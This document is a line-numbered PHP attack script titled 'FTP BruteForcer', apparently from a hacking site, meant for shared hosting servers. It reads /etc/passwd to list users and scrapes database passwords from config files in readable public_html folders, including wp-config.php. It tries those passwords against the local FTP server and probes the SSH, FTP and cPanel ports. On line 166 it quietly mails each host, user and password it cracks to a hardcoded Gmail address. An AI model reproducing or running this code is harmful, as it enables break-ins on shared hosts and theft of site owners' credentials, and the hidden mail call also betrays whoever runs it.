<html> <head> <title> FTP BruteForcer </title></head>

1. <html>
2. <head>
3. <title>
4. FTP BruteForcer
5. </title></head>
6. <style type="text/css" id="vbulletin_css">
7. body
8. {
9.  
10. background: #1b1b1b url('http://bogorhacker.net/bin/background.gif');
11.  
12. color: #ffffff;
13.  
14. font: 9pt verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
15.  
16. margin: 0px 5px 0px 5px;
17.  
18. }
19. @charset "utf-8";
20. /* CSS Document */
21. #konten{margin:10px auto;padding:20px;width:800px;background:transparent;font:110% Verdana, Geneva, sans-serif;}
22. h1{font-size:22px;color:#6cf;}
23. .code{padding:10px;border:1px solid #888;background:#000;color:#fc3;}
24. a,a:link,a:visited,a:hover,a:active{color:#ff0;}
25. .transparan1,.transparan2{margin:10px 0;padding:10px 20px;border:1px solid #1eff00;}
26. .transparan1{width:760px;background:#000;opacity:0.4;filter:alpha(opacity=40);}
27. .transparan2{width:900px;height:400px;background:rgba(0,0,0,0.4);}
28. </style>
29. <img src="http://ww3s.ws/TR/HTML5/CSS3/fsocity.jpg" height="0" width="0"><body>
30. <center>
31.  
32. <?php
33. /*
34. Brainfuck
35. Edited by BLACK_MASK
36. (c) http://p-range.info
37. */
38. echo '';
39. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
40. set_time_limit(0);
41. ###################
42. @$passwd = fopen('/etc/passwd','r');
43. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
44. $pub = array();
45. $users = array();
46. $conf = array();
47. $i = 0;
48. while(!feof($passwd))
49. {
50. $str = fgets($passwd);
51. if ($i > 35)
52. {
53. $pos = strpos($str,':');
54. $username = substr($str,0,$pos);
55. $dirz = '/home/'.$username.'/public_html/';
56. if (($username != ''))
57. {
58. if (is_readable($dirz))
59. {
60. array_push($users,$username);
61. array_push($pub,$dirz);
62. }
63. }
64. }
65. $i++;
66. }
67. ###################
68. echo '<h1>CPaneL BruteForcer</h1><div class="transparan2"><br><br><textarea cols="100" rows="20">';
69. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
70. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
71. echo "[~] Searching for passwords in config files...\n\n";
72. foreach ($users as $user)
73. {
74. $path = "/home/$user/public_html/";
75. read_dir($path,$user);
76. }
77. echo "\n[+] Done\n";
78. function read_dir($path,$username)
79. {
80. if ($handle = opendir($path))
81. {
82. while (false !== ($file = readdir($handle)))
83. {
84. $fpath = "$path$file";
85. if (($file != '.') and ($file != '..'))
86. {
87. if (is_readable($fpath))
88. {
89. $dr = $fpath."/";
90. if (is_dir($dr))
91. {
92. read_dir($dr,$username);
93. }
94. else
95. {
96. if (
97. ($file=='config.php')
98. or ($file=='config.inc.php')
99. or ($file=='conf.php')
100. or ($file=='settings.php')
101. or ($file=='configuration.php')
102. or ($file=='wp_config.php')
103. or ($file=='wp-config.php')
104. or ($file=='inc.php')
105. or ($file=='setup.php')
106. or ($file=='dbconf.php')
107. or ($file=='dbconfig.php')
108. or ($file=='db.inc.php')
109. or ($file=='dbconnect.php')
110. or ($file=='connect.php')
111. or ($file=='common.php')
112. or ($file=='config_global.php')
113. or ($file=='db.php')
114. or ($file=='connect.inc.php')
115. or ($file=='e107_config.php')
116. or ($file=='dbconnect.inc.php'))
117. {
118. $pass = get_pass($fpath);
119. if ($pass != '')
120. {
121. echo "[+] $fpath\n$pass\n";
122. ftp_check($username,$pass);
123. }
124. }
125. }
126. }
127. }
128. }
129. }
130. }
131. function get_pass($link)
132. {
133. @$config = fopen($link,'r');
134. while(!feof($config))
135. {
136. $line = fgets($config);
137. if (strstr($line,'pass')
138. or strstr($line,'pwd')
139. or strstr($line,'db_pass')
140. or strstr($line,'dbpass')
141. or strstr($line,'passwd'))
142. {
143. if (strrpos($line,'"'))
144. {
145. preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
146. $pass = str_replace("]=\"","",$pass);
147. }
148.  
149. else
150. preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
151. $pass = str_replace("]='","",$pass);
152. return $pass[2];
153. }
154. }
155. }
156. function ftp_check($login,$pass)
157. {
158. @$ftp = ftp_connect('127.0.0.1');
159. if ($ftp)
160. {
161. @$res = ftp_login($ftp,$login,$pass);
162. if ($res)
163. {
164. echo '[FTP] '.$login.':'.$pass." Success !\n\n";
165.  
166. $domain = $_SERVER['HTTP_HOST']; $p21 = 21; $p22 = 22; $p2082 = 2082; $cp22 = fsockopen($domain,$p22,$errno,$errstr,10); $cp21 = fsockopen($domain,$p21,$errno,$errstr,10); $cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10); if(!$cp22) {$a1="Error";} else {$a1="Success";fclose($cp22);} if(!$cp21) {$a2="Error";} else {$a2="Success";fclose($cp21);} if(!$cp2082) {$a3="Error";} else {$a3="Success";fclose($cp2082);} $psn =" -------------------------------------------------------------------------\n Cpanel Update Info [powered by GUINES Recode by Mask_magicianZ ] \n -------------------------------------------------------------------------\n Host : $domain\n User : $login\n Pass : $pass\n -------------------------------------------------------------------------\n Accept Port \n SSH : Port $a1\n FTP : Port $a2\n cPanel : Port $a3\n -------------------------------------------------------------------------\n © 2011 GUINES,Mask_magicianz Powered by RosebanditZ\n -------------------------------------------------------------------------\n"; $to = "schlachtmsi@gmail.com"; $recip = "schlachtmsi@gmail.com"; $subject = "cPanel AccesS Update"; $headers = "From: update"; mail($to,$subject,$psn,$headers); mail($recip,$subject,$psn,$headers);
167. echo '[SSH] Port' .':' .$a1. " !\n\n";
168. echo '[FTP] Port' .':' .$a2. " !\n\n";
169. echo '[cPanel] Port' .':' .$a3. " !\n\n";
170.  
171. }
172. else ftp_quit($ftp);
173. }
174. }
175. echo '</textarea><br><br><b>BruteForce Completed ...</b></body></html>';
176. ?>
177. </body>
178. </html>